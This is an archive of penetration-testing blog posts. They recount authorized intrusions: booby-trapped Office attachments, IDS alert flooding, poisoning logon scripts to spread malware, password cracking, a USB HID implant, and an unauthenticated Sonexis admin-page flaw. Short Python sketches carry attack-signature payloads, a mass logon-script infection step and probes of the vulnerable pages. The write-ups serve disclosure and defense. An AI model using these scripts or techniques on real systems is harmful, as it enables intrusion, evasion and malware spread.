Archive for the ‘Total Infrastructure Compromise’ Category

Whistleblower Series – The real problem with China isn’t China, it’s you.

Terms like China, APT and Zero-Day are synonymous with Fear, Uncertainty and Doubt (FUD).  The trouble is that, in our opinion anyway, these terms and their respective news articles detract from the actual problem.  For example, in 2011 only 0.12% of compromises were attributed to zero-day exploitation and 99.88% were attributed to known vulnerabilities.  Yet, despite this fact, the media continued to write about the zero-day threat as if it were a matter of urgency.  What they really should have been writing about is that the majority of people aren’t protecting their networks properly.  After all, if 99.88% of all compromises were the result of the exploitation of known vulnerabilities, then someone must not have been doing their job. Moreover, if people are unable to protect their networks from the known threat, then how are they ever going to defend against the unknown?

All of the recent press about China and their Advanced Persistent Threat is the same: it detracts from the real problem.  More clearly, the problem isn’t China, Anonymous, LulzSec, or any other FUD-ridden buzzword.  The problem is that networks are not being maintained properly from a security perspective, and so threats are aligning with risks to successfully effect penetration.  A large part of the reason why these networks are such soft targets is that their maintainers are sold a false sense of security from both the services and technology perspectives.

In this article we’ll show you how easy it was for us to hack into a sensitive government network that was guarded by industry technologies and testing best practices.  Our techniques deliberately mimicked those used by China.  You’ll notice that the techniques aren’t particularly advanced (despite the fact that the press calls them Advanced) and in fact are based largely on common sense.  You’ll also notice that we don’t exploit a single vulnerability other than those that exist in a single employee (the human vulnerability).  Because this article is based on an actual engagement we’ve altered certain aspects of our story to protect our customer’s identity.  We should also mention that since the delivery of this engagement our customer has taken effective steps to defeat this style of attack.

Here’s the story…

We recently (relatively speaking anyway) delivered a nation state style attack against one of our public sector customers.  In this particular case our testing was unrestricted and so we were authorized to perform Physical, Social and Electronic attacks.  We were also allowed to use any techniques and technologies that were available should we feel the need.

Let’s start off by explaining that our customer’s network houses databases of sensitive information that would be damaging if exposed.  They also have significantly more political weight and authority than most of the other departments in their area.  The reason why they were interested in receiving a nation-state style Penetration Test is that another department within the same area had come under attack by China.

We began our engagement with reconnaissance.  During this process we learned that the target network was reasonably well locked down from a technical perspective.  The external attack surface provided no services or applications into which we could sink our teeth.  We took a few steps back and found that the supporting networks were equally protected from a technical perspective.  We also detected three points where Intrusion Prevention was taking place: one at the state level, one at the department level, and one functioning at the host level.

(It was because of these protections and minimalistic attack surface that our client was considered by many to be highly secure.)

When we evaluated our customer from a social perspective we identified a list of all employees published on a web server hosted by yet another department.  We were able to build micro-dossiers for each employee by comparing employee names and locations to various social media sites and studying their respective accounts.  We quickly constructed a list of which employees were not active within specific social networking sites and lined them up as targets for impersonation just in case we might need to become someone else.

We also found a large document repository (not the first time we’ve found something like this) that was hosted by a different department.  Contained within this repository was a treasure trove of Microsoft Office files with respective change logs and associated usernames.  We quickly realized that this repository would be an easy way into our customer’s network.  Not only did it provide a wealth of metadata, but it also provided perfect pretexts for Social Engineering… and yes, it was open to the public.

(It became glaringly apparent to us that our customer had overlooked their social points of risk and exposure and was highly reliant on technology to protect their infrastructure and information.  It was also apparent that our customer was unaware of their own security limitations with regard to technological protections.  Based on what we read in social forums, they thought that IPS/IDS and Antivirus technologies provided ample protection.)

We downloaded a Microsoft Office document that had a change log indicating that it was being passed back and forth between one of our customer’s employees and another employee in a different department.  This was ideal because a trust relationship had already been established and was ripe for the taking.  Specifically, it was “normal” for one party to email this document to the other as a trusted attachment.  That normalcy provided the perfect pretext.

(Identifying a good pretext is critically important when planning on launching Social Engineering attacks.  A pretext is a plausible but false reason for doing something.  Presenting a victim with a good pretext often causes them to perform actions that they should not perform.)

Once our document was selected we had our research team build custom malware specifically for the purpose of embedding it into the Microsoft Office document.  As is the case with all of our malware, we built in automatic self-destruct features and expiration dates that would result in clean deinstallation when triggered.  We also built in covert communication capabilities to help avoid detection.

(Building our own malware was not a requirement but it is something that we do.  Building custom malware ensures that it will not be detected, and it ensures that it will have the right features and functions for a particular engagement.)

Once the malware was built and embedded into the document we tested it in our lab network.  The malware functioned as designed and quickly established connectivity with its command and control servers.   We should mention that we don’t build our malware with the ability to propagate for liability and control reasons.  We like keeping our infections highly targeted and well within scope.

When we were ready to begin our attack we fired off a tool designed to generate a high rate of false positives in Intrusion Detection / Prevention systems and Web Application Firewalls alike.  We ran that tool against our customer’s network and through hundreds of different proxies to force the appearance of multiple attack sources.  Our goal was to hide any real network activity behind a storm of false alarms.

(This demonstrates just how easily Intrusion Detection and Prevention systems can be defeated.  These systems trust network data and generate alerts based on that network data.  When an attacker forges network data, that attacker can also forge false alerts.  Generate enough false alerts and you disable one’s ability to effectively monitor the real threat.)
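To make this concrete, here is a minimal sketch of what a noise generator of this kind can look like.  This is not the actual tool we used; it is a few lines of Python for illustration only, and the target URL, proxy addresses, and decoy payloads are hypothetical placeholders.  The idea is simply to send harmless requests whose payloads happen to match common attack signatures, rotating through proxies so that the resulting alerts appear to come from many different sources.

    import random
    import requests

    TARGET = "https://target.example.gov/search"   # hypothetical target
    PROXIES = [                                    # hypothetical proxies used to vary the apparent source
        "http://198.51.100.10:8080",
        "http://203.0.113.25:3128",
    ]
    DECOY_PAYLOADS = [                             # harmless strings that signature-based sensors alert on
        "' OR '1'='1",
        "<script>alert(1)</script>",
        "../../../../etc/passwd",
    ]

    def send_decoy():
        proxy = random.choice(PROXIES)
        try:
            requests.get(
                TARGET,
                params={"q": random.choice(DECOY_PAYLOADS)},
                proxies={"http": proxy, "https": proxy},
                timeout=5,
            )
        except requests.RequestException:
            pass   # failures don't matter; the goal is alert volume, not responses

    for _ in range(1000):
        send_decoy()

A few thousand of these requests, spread across a few hundred proxies, is more than enough to bury real activity in the alert queue.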

While that tool was running we forged an email to our customer’s employee from the aforementioned trusted source.  That email contained our infected Microsoft Office document as an attachment.  Within less than three minutes our target received the email and opened the infected attachment, thus activating our malware.  Once activated, our malware connected back to its command and control server and we had successfully penetrated into our customer’s internal IT infrastructure.  We’ll call this initial point of Penetration T+1.  Shortly after T+1 we terminated our noise generation attack.

(The success of our infection demonstrates how ineffective antivirus technologies are at preventing infections from unknown types of malware.  The T+1 host was running a current and well-respected antivirus solution.  That solution did not interfere with our activities.  The success of our penetration at this point further demonstrates the risk introduced by the human factor.  We did not exploit any technological vulnerability but instead exploited human trust.)

Now that we had access we needed to ensure that we kept it.  One of the most important aspects of maintaining access is monitoring user activity.  We began taking screenshots of T+1’s desktop every 10 seconds.  One of those screenshots showed T+1 forwarding our email off to their IT department because they thought that the attachment looked suspicious.  While we were expecting to see rapid incident response, the response never came.  Instead, to our surprise, we received a secondary command and control connection from a newly infected host (T+2).

When we began exploring T+2 we quickly realized that it belonged to our customer’s head of IT Security.  We later learned that he received the email from T+1 and scanned the email with two different antivirus tools.  When the email came back as clean he opened the attachment and infected his own machine.  Suspecting nothing, he continued to work as normal… and so did we.

Next we began exploring the file system for T+1. When we looked at the directory containing users’ batch files we realized that their Discretionary Access Control Lists (DACLs) granted full permissions to anyone (not just domain users).  More clearly, we could read, write, modify and delete any of the batch files, so we decided to exploit this condition to commit a mass compromise.

To make this a reality, our first task was to identify a share that would allow us to store our malware installer.  This share had to be accessible in such a way that when a batch file was run it could read and execute the installer.  As it turned out, the domain controllers were configured with their entire C:\ drives shared and the same wide-open DACLs.

We located a path where other installation files were stored on one of the domain controllers.  We placed a copy of our malware into that location and named it “infection.exe”.  Then using a custom script we modified all user batch files to include one line that would run “infection.exe” whenever a user logged into a computer system.  The stage was set…
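For illustration, the batch-file modification step can be sketched in a few lines of Python.  This is not our actual script, and the share and installer paths below are hypothetical placeholders; the point is simply that, with wide-open DACLs, appending one line to every logon batch file is all it takes.

    from pathlib import Path

    SCRIPT_SHARE = Path(r"\\DC01\C$\netlogon\scripts")    # hypothetical location of the user batch files
    INSTALLER_LINE = r"\\DC01\C$\Installs\infection.exe"  # the staged installer described above

    for batch_file in SCRIPT_SHARE.glob("*.bat"):
        content = batch_file.read_text()
        if INSTALLER_LINE not in content:                 # don't add the line twice
            batch_file.write_text(content.rstrip() + "\n" + INSTALLER_LINE + "\n")

Because the DACLs granted full control to anyone, no privilege escalation was needed to make these changes.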

In no time we started receiving connections back from desktop users including but not limited to the desktops belonging to each domain admin.  We also received connections back from domain controllers, exchange servers, file repositories, etc.  Each time someone accessed a system it became infected and fell under our control.

While exploring the desktops for the domain administrators we found that one admin kept a directory called “secret”.  Within that directory were backups for all of the network devices including intrusion prevention systems, firewalls, switches, routers, antivirus, etc.  From that same directory we also extracted Visio diagrams complete with IP addresses, system types, departments, employee telephone lists, addresses, emergency contact information, etc.

At this point we decided that our next step would be to crack all passwords.  We dumped passwords from the domain controller and extracted passwords from the backed up configuration files.  We then fed our hashes to our trusted cracking machine and successfully cracked 100% of the passwords.

(We should note that during the engagement we found that most users had not changed their passwords since their accounts had been created.  We later learned that this was a recommendation made by their IT staff.  The recommendation was based on an article that was written by a well-respected security figure.)

With this done, we had achieved an irrecoverable and total infrastructure compromise.  Had we been a true foe, there would have been no effective way to remove our presence from the network.  We achieved all of this without encountering any resistance, without exploiting a single technological vulnerability, without detection (other than the forwarded email, of course) and without the help of China.  China might be hostile, but then again so are we.

Whistleblower Series – Don’t be naive, take the time to read and understand the proposal.

In our last whistleblower article, we showed that the vast majority of Penetration Testing vendors don’t actually sell Penetration Tests. We did this by deconstructing pricing methodologies and combining the results with common sense. We’re about to do the same thing to the industry average Penetration Testing proposal. Only this time we’re not just going to be critical of the vendors, we’re also going to be critical of the buyers.

A proposal is a written offer from seller to buyer that defines what services or products are being sold. When you take your car to the dealer, the dealer gives you a quote for work (the proposal). That proposal always contains an itemized list for parts and labor as well as details on what work needs to be done. That is the right way to build a service-based proposal.

The industry average Network Penetration Testing proposal fails to define the services being offered. Remember, to define something means to state its exact meaning. When we read a network penetration testing proposal and have to ask ourselves “so what is this vendor going to do for us?” then the proposal has clearly failed to define its services.

For example, just recently we reviewed a proposal that talked about “Ethos” and offered optional services called “External Validation” and “External Quarterlies” but completely failed to explain what “External Validation” and “External Quarterlies” were. We also don’t really care about “Ethos” because it has nothing to do with the business offering. Moreover, this same proposal absolutely failed to define methodology and did not provide any insight into how testing would be done. The pricing section was simply a single line item with a dollar value; it wasn’t itemized. Sure, the document promised to provide Penetration Testing services, but that’s all it really said (sort of).

This is problematic because Penetration Testing is a massively dynamic service that encompasses a potentially infinite number of techniques (attacks and tests) for penetration attempts. Some of those techniques are higher threat than others; some are even higher risk than others. If a proposal doesn’t define the tests that will be done, how they will be done, what the risks are, etc., then the vendor is free to do whatever they want and call it a day. Most commonly this means doing the absolute minimum amount of work while making it look like a lot.

Here’s some food for thought…

Imagine that we are a bulletproof vest Penetration Testing Company. It’s our job to test the effectiveness of bulletproof vests for our customers so that they can guarantee the safety of their buyers. We deliver a proposal to a customer that is the same quality as the average Network Penetration Testing proposal and our customer signs the proposal.

A week later, we receive a shipment of vests for testing. We hang those vests on dummies made up of ballistics gel in our firing range. We then take our powerful squirt guns, stand ten feet down range and squirt away. After the test is complete, we evaluate the vests and determine that they were not penetrated and so passed the Penetration Test. Our customer hears the great news and begins selling the vest on the open market.

In the scenario above, both parties are to blame. The customer did not do their job because they failed to validate the proposal, to demand clear definitions, to assess the testing methodology, etc. Instead they naively trusted the vendor. The vendor failed to meet their ethical responsibilities because they offered a misleading and dishonest service that would do nothing more than promote a false sense of security. In the end, the cost in damages (loss of life) will be significantly higher than the cost of receiving genuine services. In the end, the customer will suffer as will their own customers.

Unfortunately, this is what is happening with the vast majority of Network Penetration Tests. Vendors are perceived as experts by their customers and are delivering proposals like the ones described above. Customers then naively evaluate proposals assuming that all vendors are created equal and make buying decisions based largely on cost. They receive services (usually not a genuine penetration test), put a check in the box and move onto the next task. In reality, the only thing they’ve bought is a false sense of security.

How do we avoid this?

While we can’t force Network Penetration Testing firms to hold themselves to a higher standard, their customers can. If customers took the time to truly evaluate Network Penetration Testing proposals (or any proposal for that matter) then this problem would be eradicated. The question is: do customers really want high-quality testing, or do they just want a check in the box? In our experience, both types of customers exist but most seem to want a genuine and high-quality service.

Here are a few things that customers can do to hold their Network Penetration Testing vendor to a higher standard.

  • Make sure the engagement is properly scoped (we discussed this in our previous article)
  • Make sure the proposal uses terms that are clearly defined and make sense. For example, we saw a proposal just one week before writing this article that was for “Non-intrusive Network Penetration Testing.” Is it possible to penetrate into something without being intrusive? No.
  • Make sure that the proposal defines terms that are unique to the vendor. For example, the proposal that we mentioned previously talks about “External Quarterlies” but fails to explain what that means. Why are people signing proposals that make them pay for an undefined service? Would you sign it if it had a service called “Goofy Insurance”?
  • Make sure the vendor can explain how they came to the price points that are reflected in the proposal. Ask them to break it down for you and remember to read our first article so that you understand the differences between count-based pricing (wrong) and attack-surface-based pricing (right).
  • (We’ll provide more points in the next article).

As the customer, it is up to you to hold a vendor’s feet to the fire (we expect it). When you purchase poor quality services that are mislabeled as “Penetration Tests” then you are enabling the snake-oil vendors to continue. This is a problem because it confuses those who want to purchase genuine and high-quality services. It makes their job exceedingly difficult and in some cases causes people to lose faith in the Network Penetration Testing industry as a whole.

If you feel that what we’ve posted here is inaccurate and can provide facts to prove the inaccuracy then please let us know. We don’t want to mislead anyone and will happily modify these entries to better reflect the truth.


The 3 ways we owned you in 2012

Here are the top 3 risks that we leveraged to penetrate into our customers’ networks in 2012. Each of these has been used to effect an irrecoverable infrastructure compromise during multiple engagements across a range of different customers. We flag a compromise as “irrecoverable” when we’ve successfully taken administrative control over 60% or more of the network-connected assets. You’ll notice that these risks are more human-oriented than they are technology-oriented, thus demonstrating that your people are your greatest risk. While we certainly do focus on technological risks, they don’t fall into the top three categories.

The general methodology that we follow to achieve an irrecoverable infrastructure compromise is depicted below at a high level.

  1. Gain entry via a single point (one of the 3 referenced below)
  2. Install custom backdoor (RADON, our safe, undetectable, home-grown pseudo-malware)
  3. Identify and penetrate the domain controller (surprisingly easy in most cases)
  4. Extract and crack the passwords (we have pretty rainbow tables and access to a GPU cracker)
  5. Propagate the attack to the rest of the network (Distributed Metastasis)

 

Social Engineering

Social Engineering is the art of manipulating people into divulging information or performing actions usually for the purpose of gaining access to a computer system or network connected resource. It is similar to fraud, but the attacker very rarely comes face-to-face with his or her victims. Today, Social Engineering is used to help facilitate the delivery of technological attacks like the planting of malware, spy devices, etc.

During an engagement in 2012, Netragard used Social Engineering to execute an irrecoverable infrastructure compromise against one of its healthcare customers. This was done through a job opportunity that was posted on our customer’s website. Specifically, our customer was looking to hire a Web Application Developer that understood how to design secure applications. We built an irresistible resume and established fake references, which quickly landed us an on-site interview. When we arrived, we were picked up by our contact and taken to his office. While sitting there, we asked him for a glass of water and he promptly left us alone in his office for roughly 2 minutes. During that time, we used a USB device to infect his desktop computer with RADON (our pseudo-malware). When he returned we thanked him for the water and continued on with the interview. In the end, we were offered the job but turned it down (imagine if we had accepted it).

If you aren’t subjecting your staff to real social engineering then you aren’t receiving a realistic penetration test. While the example above represents an elevated threat, we test at a variety of different threat levels. The key is to keep it realistic.

Malware

The word malware is derived from “Malicious Software.”  Any software that was written for the purpose of being malicious is by definition malware. This includes but is not limited to trojans, worms, and viruses.  Today malware is evolving and is becoming harder and harder to detect. Most people are under the impression that their antivirus software will protect them from malware when in reality their antivirus software is borderline useless. Antivirus software can only detect malware if it knows what to look for. This means that new, never-before-seen variants of malware go undetected so long as they avoid the known-bad behaviors that heuristic engines are tuned to flag. What’s more interesting is that we found that antivirus software can’t even detect known malware if the known malware has been packed.
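The packing problem is easy to illustrate.  The toy example below (Python, purely illustrative; this is not how any particular antivirus engine is implemented) uses a file hash as a stand-in for a signature.  Once the sample is trivially re-encoded, the signature no longer matches even though the underlying logic is unchanged.

    import hashlib

    known_sample = b"...bytes of a known malware sample..."    # stand-in content
    signature_db = {hashlib.sha256(known_sample).hexdigest()}  # "signatures" of known samples

    def is_detected(sample: bytes) -> bool:
        return hashlib.sha256(sample).hexdigest() in signature_db

    # A naive one-byte XOR "packer"; real packers are far more elaborate.
    packed_sample = bytes(b ^ 0x41 for b in known_sample)

    print(is_detected(known_sample))    # True  - the known sample matches its signature
    print(is_detected(packed_sample))   # False - same behavior, new bytes, no match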

We used RADON, our home-brew “safe” malware, in nearly every engagement in 2012. RADON is designed to enable us to infect customer systems in a safe and controllable manner. Safe means that every strain is built with an expiration date that, when reached, results in RADON performing an automatic and clean self-removal. Safe also means that we have the ability to tell RADON to deinstall at any point during the engagement should any customer make the request. RADON is 100% undetectable and will completely evade all antivirus software, intrusion prevention / detection systems, etc. Why did we build RADON? We built it because we need to have the same capabilities as the bad guys; if we didn’t, our testing wouldn’t be realistic.

One last thing that you should know about malware is that it doesn’t usually exploit technological vulnerabilities to infect systems. Instead, it exploits human gullibility, and we all know that humans are far easier to exploit than technology! The “ILOVEYOU” worm is a prime example. The worm would email itself to a victim with a subject of “I LOVE YOU” and an attachment titled “LOVE-LETTER-FOR-YOU.txt.vbs,” which was actually a copy of the worm. When a person attempted to read the attachment, they would inadvertently run the copy and infect their own computer. Once infected, the worm would begin the process again and email copies of itself to the first 50 email addresses in the victim’s address book. This technique of exploiting gullibility was so successful that in the first 10 days, more than 50 million infections were reported. Had people spent more time educating each other about the risks of socially augmented technical attacks then the impact might have been significantly reduced.

Configuration Vulnerabilities

Configuration Vulnerabilities most commonly seem to be created when third parties deploy software on customer networks.  They often fail to remove setup files, default accounts, default credentials, etc.  As a result, hackers scan the internet for common configuration vulnerabilities and often use those to penetrate into affected systems.  Sometimes configuration vulnerabilities aren’t particularly useful for gaining access and are simply destructive when triggered.

For example, our team was recently performing an Advanced External Penetration Test for a small bank on the southern part of the east coast. This bank had an online banking web application that was deployed by a vendor. The portal worked fine, but the vendor’s consultant didn’t clean up the setup files after configuration. During our engagement, we performed directory enumeration against the poorly configured target using wfuzz (standard practice during any penetration testing engagement). Our enumerator identified a directory called “AppSetup” and when it requested the page from that directory we received a message that read “Database Initialized Successfully.” Yes, that’s right, simply visiting the page wiped out one of the bank’s customer databases. What’s scarier is that this was done from the internet, didn’t require any authentication, and would have been triggered by anyone who simply accessed that specific URL.
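For readers who haven’t seen directory enumeration before, the sketch below shows the idea in a few lines of Python (on the engagement we used wfuzz with a much larger wordlist; the host name and wordlist here are hypothetical placeholders).  It requests candidate paths and reports anything that doesn’t come back as a 404.  In our case, one of the discovered paths was the “AppSetup” directory, and simply requesting it re-initialized the database.

    import requests

    BASE = "https://banking.example.com"   # hypothetical host
    WORDLIST = ["admin", "AppSetup", "backup", "config", "setup", "test"]

    for word in WORDLIST:
        url = f"{BASE}/{word}/"
        try:
            response = requests.get(url, timeout=5, allow_redirects=False)
        except requests.RequestException:
            continue
        if response.status_code != 404:
            print(response.status_code, url)   # anything that answers deserves a closer look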

Another common Configuration Vulnerability exists within networks of all sizes and has everything to do with Active Directory and the account lockout after login failure setting. When delivering a Penetration Test to two separate customers in 2012 we inadvertently created a company-wide denial of service. In both cases, the reason for the outage was that the customer had bad configurations established in Active Directory. Specifically, accounts were locked out for 24 hours after 3 login failures. During both engagements, we were authorized to perform password guessing attacks against all external points of authentication. During both engagements, we managed to lock out nearly every user account for a 24-hour period. One of the customers (a large bank) couldn’t remember their master domain admin password and so their outage was extended to nearly 24 hours. In this particular case, setting a lockout to 24 hours creates a critical availability-impacting vulnerability. We really don’t see any point in setting your lockout to anything greater than 5 minutes (if you want to know why feel free to leave a comment).

In closing, configuration vulnerabilities are the product of unsafe configurations. What is unfortunate is that these vulnerabilities are almost always identified through triggering, which results in an outage or damage of some sort. It’s important to remember that it’s not our fault if your systems are not configured properly.

Thank You Anonymous

We (Netragard) have been meaning to say Thank You to Anonymous for a long time now. With that said, Netragard does not condone the actions of Anonymous, nor the damage they have caused.   What Anonymous has demonstrated, and continues to demonstrate, is just how poorly most network infrastructures are managed from a security perspective (globally, not just within the USA).  People need to wake up.

If you take the time to look at most of the hacks done by Anonymous, you’ll find that their primary points of entry are really quite basic.  They often involve the exploitation of simple SQL Injection vulnerabilities, poorly configured servers, or even basic Social Engineering.  We’re not convinced that Anonymous is talentless; we just think that they haven’t had to use their talent because the targets are so soft.

What Anonymous has really exposed here are issues with the security industry as a whole and with the customers that are being serviced. Many of Anonymous’s victims use third party Penetration Testing vendors and nightly Vulnerability Scanning services.  Many of them even use “best of breed” Intrusion Prevention Systems and “state of the art” firewalls.  Despite this, Anonymous still succeeds at Penetration with relative ease, without detection and by exploiting easy to identify vulnerabilities.  So the question becomes, why is Anonymous so successful?

Part of the reason is that regulatory requirements like PCI DSS 11.3 (and others) shift businesses from wanting Penetration Tests for security reasons to needing Penetration Tests in order to satisfy regulatory requirements.  What is problematic is that most regulatory requirements provide no minimum quality standard for Penetration Testing.  They also provide no incentive for quality testing.  As a result, anyone with an automated vulnerability scanner and the ability to vet results can deliver bare minimum services and satisfy the requirement.

We’ll drive this point home with an analogy.  Suppose you manufacture bulletproof vests for the military.  Regulations state that each version of your vest must pass a Penetration Test before you can sell it to the military.   The regulations do not define a quality standard against which the vests should be tested.  Since your only goal is to satisfy regulations, you hire the lowest bidder.  They perform Penetration Testing against your bulletproof vest using a squirt gun.  Once testing is complete you receive a report stating that your vests passed the test.  Would you want to wear that vest into battle?  (Remember, Anonymous uses bullets not water).

This need to receive the so-called “Passing” Penetration Test has degraded the cumulative quality of Penetration Testing services.  There are far more low-quality testing firms than there are high-quality.  Adding to the issue is that the low-quality firms advertise their services using the same language, song and dance as high-quality firms.  This makes it difficult for anyone interested in purchasing high-quality services to differentiate between vendors.  (In fact, we’ve written a white paper about this very thing).

A possible solution to this problem would be for the various regulatory bodies to define a minimum quality standard for Penetration Testing.  This standard should force Penetration Testing firms to test realistically.  This means that they do not ask their customers to add their IP addresses to the whitelist for their Intrusion Prevention Systems or Web Application Firewalls.  It means that they require Social Engineering (including but not limited to the use of home-grown pseudomalware), it means that they test realistically, period.   If a vendor can’t test realistically then the vendor shouldn’t be in the testing business.

What this also means is that people who need Penetration Tests will no longer be able to find a low-cost, low-quality vendor to provide them with a basic check in the box.  Instead, they will actually need to harden their infrastructures or they won’t be compliant.

We should mention that not all businesses are in the market of purchasing low-quality Penetration Testing services.  Some businesses seek out high-quality vendors and truly want to know where their vulnerabilities are.  They not only allow but also expect their selected Penetration Testing vendor to test realistically and use the same tactics and talent as the actual threat.  These types of businesses tend to be more secure than average and successfully avoid Anonymous’s victim list (at least so far). They understand that the cost of good security is a fraction of the cost in damages of a single successful compromise, but unfortunately not everyone understands that.

So is it really any surprise that Anonymous has had such a high degree of success?  We certainly don’t think so.  And again, while we don’t condone their actions, we can say thank you for proving our point.


Hacking the Sonexis ConferenceManager

Netragard’s Penetration Testing services use a research-based methodology called Real Time Dynamic Testing™. Research-based methodologies are different in that they focus on identifying both new and known vulnerabilities, whereas standard methodologies usually, if not always, identify only known vulnerabilities. Sometimes when performing research-based penetration testing we identify issues that not only affect our customer but also have the potential to impact anyone using a particular technology. Such was the case with the Sonexis ConferenceManager.

The last time we came across a Sonexis ConferenceManager we found a never before discovered Blind SQL Injection vulnerability.  This time we found a much more serious (also never before discovered) authorization vulnerability. We felt that this discovery deserved a blog entry to help make people aware of the issue as quickly as possible.

What really surprised us about this vulnerability was its simplicity and the fact that nobody (not even us) had found it before.  Discovery and exploitation required no wizardry or special talent. We simply had to browse to the affected area of the application and we were given the keys to the kingdom (literally). What is even scarier is that this vulnerability could lead to a mass compromise if automated with a specialized Google search (but we won’t give more detail on that here, yet).

So let’s dig in…

All versions of the Sonexis ConferenceManager fail to check whether users attempting to access the “/admin/backup/settings.asp”, “/admin/backup/download.asp” or “/admin/backup/upload.asp” pages are authorized. Because of this, anyone can browse to one of those pages without first authenticating.  When they do, they’ll have full administrative privileges over the respective Sonexis ConferenceManager pages.  A screenshot of the “settings.asp” page is provided below.
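Checking whether a given installation is affected takes nothing more than an unauthenticated request to each of those pages.  The sketch below is one way to express that in Python; the host name is a hypothetical placeholder, and a 200 response with no prior login means the page is being served to anonymous users.

    import requests

    HOST = "https://conference.example.com"   # hypothetical ConferenceManager host
    PAGES = [
        "/admin/backup/settings.asp",
        "/admin/backup/download.asp",
        "/admin/backup/upload.asp",
    ]

    for page in PAGES:
        # verify=False because many of these appliances use self-signed certificates
        response = requests.get(HOST + page, timeout=5, verify=False, allow_redirects=False)
        print(response.status_code, page)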

The first thing that we noticed when we accessed the page was that the fields were filled out for us.  This made us curious, especially since the credentials appeared to belong to our customer’s domain.  When we looked at the document source we found that we not only had the “User ID:” but were also provided with the “Password:” in clear text.

As it turned out, compromising our customer’s IT infrastructure was as simple as using the disclosed credentials to VPN into their network.  Once in we used the same credentials to access Active Directory and to create a second domain administrator account called “netragard”.  We also downloaded the entire password table from Active Directory and began cracking that with hashcat.  While that was being cracked we used our new domain admin account to access any resource that authenticated against Active Directory.  Suffice it to say we had used the Sonexis ConferenceManager vulnerability to compromise the entire IT infrastructure.

But the vulnerabilities didn’t stop there…

As it turns out we could also download the Sonexis ConferenceManager Microsoft SQL database in its entirety.  This was done by changing the backup configuration in the “settings.asp” page.  Once the backup destination was pointed at a location that we controlled, we were able to download the database (after configuring Samba locally).

 

After we downloaded the file (in zip format) we decompressed it and examined the extracted contents.

Once decompressed we loaded the files into our local MSSQL database and began to explore the contents.  Not only did we have audio recordings, configuration settings, and other sensitive data, but the administrative password for the Sonexis ConferenceManager was also stored in plain text, as shown in the screenshot below. This in and of itself is yet another vulnerability.

We were able to use the credentials to log in to the Sonexis ConferenceManager without issue…

Last but not least…

We found that it was also possible to insert a backdoor into our local copy of the Sonexis ConferenceManager database.  Once the backdoor was created we could re-zip the files and upload the “infected” Microsoft SQL database back to the Sonexis ConferenceManager.  Once loaded, the backdoor would activate, allowing the attacker to regain entry to the system.

Regarding vendor notification…

Sonexis was notified on 1/31/2012 about the authorization vulnerabilities disclosed in this article.  Sonexis responded once (with a less than friendly, non-cooperative response) on 2/1/2012 and a second time (with a very friendly cooperative response) on 2/6/2012.  We replied to the second response providing the full details of our research to Sonexis.  Sonexis took the information and had a quick fix ready for their customers the next day on 02/07/2012!  They notified their customers that same day with the following email.

We’d like to thank Sonexis for taking the time to be receptive and working with us.  Not only is that the right thing to do, but it showed us that Sonexis takes their customers’ security very seriously.  As it turned out, the initial (less than friendly) response was due to a miscommunication (someone not paying attention to what we were telling them).  The second response came from someone else who was actually a great pleasure to work with.  Suffice it to say that in the end we were really quite impressed with how quickly Sonexis pushed out a fix (and yes it works, we verified that).

If you are a Sonexis ConferenceManager user we strongly urge you to update your system now.

Updated on: 02-16-2012

This vulnerability can be exploited from the Internet.  The image below shows a small sample of Sonexis ConferenceManager users who are vulnerable.  This sample was identified using a combination of Ruby and a specially crafted Google search.

Netragard’s Badge of Honor (Thank you McAfee)

Here at Netragard We Protect You From People Like Us™ and we mean it.  We don’t just run automated scans, massage the output, and draft you a report that makes you feel good.  That’s what many companies do.  Instead, we “hack” you with a methodology that is driven by hands-on research, designed to create realistic and elevated levels of threat.  Don’t take our word for it though; McAfee has helped us prove it to the world.

Through their Threat Intelligence service, McAfee Labs listed Netragard as a “High Risk” due to the level of threat that we produced during a recent engagement.  Specifically, we were using a beta variant of our custom Meterbreter malware (not to be confused with Metasploit’s Meterpreter) during an Advanced Penetration Testing engagement.  The beta malware was identified and submitted to McAfee via our customer’s Incident Response process.  The result was that McAfee listed Netragard as a “High Risk”, which caught our attention (and our customer’s attention) pretty quickly.

McAfee Flags Netragard as a High Risk

Badge of Honor

McAfee was absolutely right; we are “High Risk”, or more appropriately, “High Threat”, which in our opinion is critically important when delivering quality Penetration Testing services.  After all, the purpose of a Penetration Test (with regard to IT security) is to identify the presence of points where a real threat can make its way into or through your IT Infrastructure.  Testing at less than realistic levels of threat is akin to testing a bulletproof vest with a squirt gun.

Netragard uses a methodology that’s been dubbed Real Time Dynamic Testing™ (“RTDT”).  Real Time Dynamic Testing™ is a research-driven methodology specifically designed to test the Physical, Electronic (networked and standalone) and Social attack surfaces at a level of threat that is slightly greater than what is likely to be faced in the real world.  Real Time Dynamic Testing™ requires that our Penetration Testers be capable of reverse engineering, writing custom exploits, building and modifying malware, etc.  In fact, the first rendition of our Meterbreter was created as a product of this methodology.

Another important aspect of Real Time Dynamic Testing™ is the targeting of attack surfaces individually or in tandem.  The “Netragard’s Hacker Interface Device” article is an example of how Real Time Dynamic Testing™ was used to combine Social, Physical and Electronic attacks to achieve compromise against a hardened target.  Another article titled “Facebook from the hackers perspective” provides an example of socially augmented electronic attacks driven by our methodology.

It is important that we thank McAfee for two reasons.  First we thank McAfee for responding to our request to be removed from the “High Risk” list so quickly because it was preventing our customers from being able to access our servers.  Second and possibly more important, we thank McAfee for putting us on their “High Risk” list in the first place.  The mere fact that we were perceived as a “High Risk” by McAfee means that we are doing our job right.


Netragard’s Hacker Interface Device (HID).

We (Netragard) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services whatsoever. It also excluded the use of social attack vectors based on social networks, telephone, or email and disallowed any physical access to the campus and surrounding areas. With all of these limitations in place, we were tasked with penetrating into the network from the perspective of a remote threat, and succeeded.

The first method of attack that people might think of when faced with a challenge like this is the use of the traditional autorun malware on a USB stick. Just mail a bunch of sticks to different people within the target company and wait for someone to plug one in; when they do it’s game over, they’re infected. That trick worked great back in the day but not so much anymore. The first issue is that most people are well aware of the USB stick threat due to the many published articles about the subject. The second is that more and more companies are pushing out group policies that disable the autorun feature in Windows systems. Those two things don’t eliminate the USB stick threat, but they certainly have a significant impact on its level of success and we wanted something more reliable.

Enter PRION, the evil HID.


 

A prion is an infectious agent composed of a protein in a misfolded form. In our case the prion isn’t composed of proteins but instead is composed of electronics which include a Teensy microcontroller, a micro USB hub (a small one from RadioShack), a mini USB cable (we needed the ends), a micro flash drive (made from one of our Netragard USB Streamers), some home-grown malware (certainly not designed to be destructive), and a USB device like a mouse, missile turret, dancing stripper, chameleon, or whatever else someone might be tempted to plug in. When they do plug it in, they will be infected by our custom malware and we will use that point of infection to compromise the rest of the network.

